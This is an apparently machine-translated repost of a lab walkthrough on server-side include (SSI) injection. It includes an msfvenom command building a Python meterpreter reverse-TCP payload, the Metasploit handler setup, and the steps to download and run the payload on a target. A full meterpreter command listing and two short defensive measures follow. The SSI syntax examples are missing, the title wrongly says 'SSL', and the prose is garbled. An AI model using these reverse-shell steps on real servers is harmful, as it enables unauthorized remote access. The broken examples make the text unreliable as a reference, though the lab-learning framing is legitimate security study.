Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to analyze Web security SSL injection. The article is rich in content and analyzed and described from a professional point of view. I hope you can get something after reading this article.

Preface

How do I enter the mainframe from the outside?

Introduction to SSI injection attack

The emergence of SSI (server side inject) is to give the HTML static page dynamic effect, through SSI to execute system commands; and return the corresponding results.

If a file suffix such as `.stm; .shtm; .shtml; `is found in the website directory, and the website does not filter SSI input strictly or inadequately, it is likely to be attacked by SSI injection.

SSI syntax

① displays server-side environment variables

Name of this document:

Now time:

Display the IP address:

② inserts text content directly into the document

Note: file include files can be in the same level directory or its subdirectories, but not in the next level directory. Virtual include files can be the full path of the virtual directory on the Web site.

③ displays information about WEB documents (such as file production date / size, etc.)

Last updated date of the file:

Length of the file:

④ directly executes various programs on the server (such as CGI or other executable programs)

For example:

List the files and directories in the current directory

Is to execute some terminal commands.

For further use, download a shell script and rename it shell.php

Make webshell

Webshell made using php before, this time using python

Msfvenom-p python/meterpreter/reverse_tcp lhost=10.0.2.4 lport=4444-f raw > / root/Desktop/shell.py

Start listening and use metasploit to listen on port 4444

Msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf5 exploit (multi/handler) > set payload python/meterpreter/reverse_tcppayload = > python/meterpreter/reverse_tcp

Msf5 exploit (multi/handler) > set lhost 10.0.2.4

Lhost = > 10.0.2.4

Msf5 exploit (multi/handler) > run

[*] Started reverse TCP handler on 10.0.2.4VR 4444

After setting up, start listening on port 4444.

Move shell.py to the apache directory before you can download it using the link to the IP address

Then you need to open the apache service `service apache2 start`.

Then execute the download command to download shell to the site directory of the target machine.

Then the execution statement gives shell the right to execute before executing.

# add permission # execute

Then I saw that the browser kept sending requests, went to the terminal to check the listening status, and found that meterpreter was returned.

Enter `?` to view the currently executable commands

Core Commands

=

Command Description

--

? Help menu

Background Backgrounds the current session

Bg Alias for background

Bgkill Kills a background meterpreter script

Bglist Lists running background scripts

Bgrun Executes a meterpreter script as a background thread

Channel Displays information or control active channels

Close Closes a channel

Disable_unicode_encoding Disables encoding of unicode strings

Enable_unicode_encoding Enables encoding of unicode strings

Exit Terminate the meterpreter session

Get_timeouts Get the current session timeout values

Guid Get the session GUID

Help Help menu

Info Displays information about a Post module

Irb Open an interactive Ruby shell on the current session

Load Load one or more meterpreter extensions

Machine_id Get the MSF ID of the machine attached to the session

Migrate Migrate the server to another process

Pry Open the Pry debugger on the current session

Quit Terminate the meterpreter session

Read Reads data from a channel

Resource Run the commands stored in a file

Run Executes a meterpreter script or Post module

Secure (Re) Negotiate TLV packet encryption on the session

Sessions Quickly switch to another session

Set_timeouts Set the current session timeout values

Sleep Force Meterpreter to go quiet, then re-establish session.

Transport Change the current transport mechanism

Use Deprecated alias for "load"

Uuid Get the UUID for the current session

Write Writes data to a channel

Stdapi: File system Commands

= =

Command Description

--

Cat Read the contents of a file to the screen

Cd Change directory

Checksum Retrieve the checksum of a file

Chmod Change the permissions of a file

Cp Copy source to destination

Dir List files (alias for ls)

Download Download a file or directory

Edit Edit a file

Getlwd Print local working directory

Getwd Print working directory

Lcd Change local working directory

Lls List local files

Lpwd Print local working directory

Ls List files

Mkdir Make directory

Mv Move source to destination

Pwd Print working directory

Rm Delete the specified file

Rmdir Remove directory

Search Search for files

Upload Upload a file or directory

Stdapi: Networking Commands

= =

Command Description

--

Ifconfig Display interfaces

Ipconfig Display interfaces

Portfwd Forward a local port to a remote service

Resolve Resolve a set of host names on the target

Stdapi: System Commands

=

Command Description

--

Execute Execute a command

Getenv Get one or more environment variable values

Getpid Get the current process identifier

Getuid Get the user that the server is running as

Kill Terminate a process

Localtime Displays the target system's local date and time

Pgrep Filter processes by name

Pkill Terminate processes by name

Ps List running processes

Shell Drop into a system command shell

Sysinfo Gets information about the remote system, such as OS

Stdapi: Audio Output Commands

= =

Command Description

--

Play play a waveform audio file (.wav) on the target system

Enter shell to take advantage of, and then check the id, and find that the current login is only an ordinary user, not a root user.

The terminal can choose to optimize it to display the user name and hostname, just like the terminal form of kali.

Python-c 'import pty;pty.spawn ("/ bin/bash")'

Then there is the right to raise the weight. the shooting range does not set the threshold value in order to learn SSI injection, so it does not continue.

There are many filtering mechanisms for SSI vulnerability servers that need to be bypassed, such as case.

Defensive measures:

First, filter the special characters in these grammar.

2. Turn off the server SSI related functions

The above is the editor for you to share how to analyze Web security SSL injection, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.